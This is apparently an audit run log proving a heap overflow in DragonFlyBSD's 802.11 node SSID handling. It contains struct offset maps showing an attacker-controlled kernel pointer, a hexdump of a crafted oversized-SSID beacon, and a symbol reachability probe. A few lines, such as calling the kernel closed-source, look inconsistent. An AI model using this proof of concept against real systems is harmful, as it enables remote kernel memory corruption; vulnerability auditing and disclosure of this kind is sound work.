DragonFlyBSD Kernel Audit
DF-0326 / run.log
===== node_overflow (code-level proof) =====
DF-0326: ieee80211_node SSID heap overflow -- code-level proof
struct node_tail size = 136 bytes (LP64)
Offsets (from start of node_tail):
  ni_esslen              off=28   size=1 
  ni_essid[32]           off=29   size=32
  ni_rates               off=61   size=16
  ni_chan (POINTER)      off=80   size=8   (kernel POINTER)
  ni_fhdwell             off=88   size=2 
  ni_fhindex             off=90   size=1 
  ni_erp                 off=92   size=2 
  ni_timoff              off=94   size=2 
  ni_dtim_period         off=96   size=1 
  ni_dtim_count          off=97   size=1 
  ni_meshidlen           off=98   size=1 
  ni_meshid[32]          off=99   size=32

ni_essid -> ni_chan distance = 51 bytes
=> an SSID of length >= 59 fully overwrites ni_chan.

=== overflow with ssid_len = 32 (ni_esslen now 32) ===
  ni_essid sink is 32 bytes wide; memcpy wrote 32 bytes -> 0 byte OVERFLOW
  ni_esslen              off=28   size=1   intact   
  ni_essid[32]           off=29   size=32  [SINK] fits
  ni_rates               off=61   size=16  intact   
  ni_chan (POINTER)      off=80   size=8   intact     ptr=0xdeadbeef12345678
  ni_fhdwell             off=88   size=2   intact   
  ni_fhindex             off=90   size=1   intact   
  ni_erp                 off=92   size=2   intact   
  ni_timoff              off=94   size=2   intact   
  ni_dtim_period         off=96   size=1   intact   
  ni_dtim_count          off=97   size=1   intact   
  ni_meshidlen           off=98   size=1   intact   
  ni_meshid[32]          off=99   size=32  intact   

=== overflow with ssid_len = 48 (ni_esslen now 48) ===
  ni_essid sink is 32 bytes wide; memcpy wrote 48 bytes -> 16 byte OVERFLOW
  ni_esslen              off=28   size=1   intact   
  ni_essid[32]           off=29   size=32  [SINK] overflows past end
  ni_rates               off=61   size=16  CLOBBERED
  ni_chan (POINTER)      off=80   size=8   intact     ptr=0xdeadbeef12345678
  ni_fhdwell             off=88   size=2   intact   
  ni_fhindex             off=90   size=1   intact   
  ni_erp                 off=92   size=2   intact   
  ni_timoff              off=94   size=2   intact   
  ni_dtim_period         off=96   size=1   intact   
  ni_dtim_count          off=97   size=1   intact   
  ni_meshidlen           off=98   size=1   intact   
  ni_meshid[32]          off=99   size=32  intact   
  ni_chan at offset 80 is BEYOND this ssid_len (77) -> not reached

=== overflow with ssid_len = 56 (ni_esslen now 56) ===
  ni_essid sink is 32 bytes wide; memcpy wrote 56 bytes -> 24 byte OVERFLOW
  ni_esslen              off=28   size=1   intact   
  ni_essid[32]           off=29   size=32  [SINK] overflows past end
  ni_rates               off=61   size=16  CLOBBERED
  ni_chan (POINTER)      off=80   size=8   CLOBBERED  ptr=0xdeadbecccccccccc  <-- ATTACKER-CONTROLLED KERNEL POINTER
  ni_fhdwell             off=88   size=2   intact   
  ni_fhindex             off=90   size=1   intact   
  ni_erp                 off=92   size=2   intact   
  ni_timoff              off=94   size=2   intact   
  ni_dtim_period         off=96   size=1   intact   
  ni_dtim_count          off=97   size=1   intact   
  ni_meshidlen           off=98   size=1   intact   
  ni_meshid[32]          off=99   size=32  intact   
  ni_chan bytes after overflow (offset 80): ccccccccccbeadde   <- 5/8 bytes of the channel pointer are attacker-controlled

=== overflow with ssid_len = 192 (ni_esslen now 192) ===
  ni_essid sink is 32 bytes wide; memcpy wrote 192 bytes -> 160 byte OVERFLOW
  ni_esslen              off=28   size=1   intact   
  ni_essid[32]           off=29   size=32  [SINK] overflows past end
  ni_rates               off=61   size=16  CLOBBERED
  ni_chan (POINTER)      off=80   size=8   CLOBBERED  ptr=0xcccccccccccccccc  <-- ATTACKER-CONTROLLED KERNEL POINTER
  ni_fhdwell             off=88   size=2   CLOBBERED
  ni_fhindex             off=90   size=1   CLOBBERED
  ni_erp                 off=92   size=2   CLOBBERED
  ni_timoff              off=94   size=2   CLOBBERED
  ni_dtim_period         off=96   size=1   CLOBBERED
  ni_dtim_count          off=97   size=1   CLOBBERED
  ni_meshidlen           off=98   size=1   CLOBBERED
  ni_meshid[32]          off=99   size=32  CLOBBERED
  ni_chan bytes after overflow (offset 80): cccccccccccccccc   <- 8/8 bytes of the channel pointer are attacker-controlled

=== overflow with ssid_len = 255 (ni_esslen now 255) ===
  ni_essid sink is 32 bytes wide; memcpy wrote 255 bytes -> 223 byte OVERFLOW
  ni_esslen              off=28   size=1   intact   
  ni_essid[32]           off=29   size=32  [SINK] overflows past end
  ni_rates               off=61   size=16  CLOBBERED
  ni_chan (POINTER)      off=80   size=8   CLOBBERED  ptr=0xcccccccccccccccc  <-- ATTACKER-CONTROLLED KERNEL POINTER
  ni_fhdwell             off=88   size=2   CLOBBERED
  ni_fhindex             off=90   size=1   CLOBBERED
  ni_erp                 off=92   size=2   CLOBBERED
  ni_timoff              off=94   size=2   CLOBBERED
  ni_dtim_period         off=96   size=1   CLOBBERED
  ni_dtim_count          off=97   size=1   CLOBBERED
  ni_meshidlen           off=98   size=1   CLOBBERED
  ni_meshid[32]          off=99   size=32  CLOBBERED
  ni_chan bytes after overflow (offset 80): cccccccccccccccc   <- 8/8 bytes of the channel pointer are attacker-controlled

VERDICT: ni_essid[32] is overflowed by any Beacon whose SSID IE
length byte exceeds 32. ni_rates (offset 32) and the ni_chan kernel
POINTER (offset 51 from ni_essid) are both attacker-writable.

===== beacon_gen 192 > beacon.bin =====
DF-0326 beacon emitted: ssid_len=192 (>32 triggers the ni_essid[32] overflow;
  ni_rates + ni_chan pointer are clobbered). Total 192 SSID bytes attack-controlled.
first 96 bytes of the crafted beacon (hexdump -C):
00000000  08 00 00 00 ff ff ff ff  ff ff 00 11 22 33 44 55  |............"3DU|
00000010  00 11 22 33 44 55 00 00  00 00 00 00 00 00 00 00  |.."3DU..........|
00000020  64 00 01 04 00 c0 41 42  43 44 45 46 47 48 49 4a  |d.....ABCDEFGHIJ|
00000030  4b 4c 4d 4e 4f 50 51 52  53 54 55 56 57 58 59 5a  |KLMNOPQRSTUVWXYZ|
00000040  41 42 43 44 45 46 47 48  49 4a 4b 4c 4d 4e 4f 50  |ABCDEFGHIJKLMNOP|
00000050  51 52 53 54 55 56 57 58  59 5a 41 42 43 44 45 46  |QRSTUVWXYZABCDEF|
beacon.bin size:
-rw-r--r--  1 maxx  maxx  239 Jul  1 16:09 beacon.bin
--- decode: byte at offset 0x26 (38) is fc0 subtype, SSID IE tag+len at body offset 0x18..0x19 ---

===== live-kernel reachability probe =====
--- vulnerable symbols in /boot/kernel/kernel (T = live text) ---
ffffffff8078c4c0 T ieee80211_add_scan
ffffffff8077dc50 T ieee80211_init_neighbor
ffffffff8077d1f0 T ieee80211_sta_join
ffffffff8077c570 t ieee80211_sta_join1
--- SSID_INVALID status flag consumers (should be NONE) ---
grep -c BPARSE_SSID_INVALID across the wlan tree: live kernel is closed-source; see env.txt host-side analysis
--- 802.11 interfaces present (radio check) ---
vtnet0 lo0
RUN_OK
RUN_EXIT=0